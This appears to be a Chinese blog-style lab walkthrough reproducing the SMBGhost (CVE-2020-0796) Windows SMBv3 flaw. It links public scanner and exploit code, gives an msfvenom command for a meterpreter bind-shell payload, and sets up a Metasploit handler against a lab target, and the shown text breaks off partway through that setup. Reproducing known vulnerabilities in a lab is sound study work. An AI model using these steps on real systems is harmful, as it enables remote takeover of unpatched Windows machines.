《永恒之黑》CVE-2020-0796漏洞复现
-
|漏洞简介
2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁,本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。
-
|影响版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
-
|漏洞复现
1.环境搭建:
kali 攻击机:192.168.87.128
win10靶机:192.168.87.143
2.查看win10靶机版本,win+r,输入winver
3.使用SMBGhost工具检测win靶机是否存在漏洞,工具下载:https://github.com/ollypwn/SMBGhost《永恒之黑》CVE-2020-0796漏洞复现 《永恒之黑》CVE-2020-0796漏洞复现 也可以使用蓝屏payload,验证漏洞。蓝屏poc下载:https://github.com/chompie1337/SMBGhost_RCE_PoC《永恒之黑》CVE-2020-0796漏洞复现 win10出现蓝屏,说明存在漏洞《永恒之黑》CVE-2020-0796漏洞复现 《永恒之黑》CVE-2020-0796漏洞复现 当然也有其他很多方法,如:
https://github.com/joaozietolie/CVE-2020-0796-Checker
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
4.利用msfvenom生成的exp反弹shell
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit
msf生成的exploit《永恒之黑》CVE-2020-0796漏洞复现 替换SMBGhost_RCE_PoC中的exploit.py,并把buf改为USER_PAYLOAD《永恒之黑》CVE-2020-0796漏洞复现 《永恒之黑》CVE-2020-0796漏洞复现 5.替换好了,设置msf监听
msfconsole //运行msf
use exploit/multi/handler //开启监听模块
set payload windows/x64/meterpreter/bind_tcp //设置反弹模式
set rhost 192.168.87.143 //设置目标靶机ip
《永恒之黑》CVE-2020-0796漏洞复现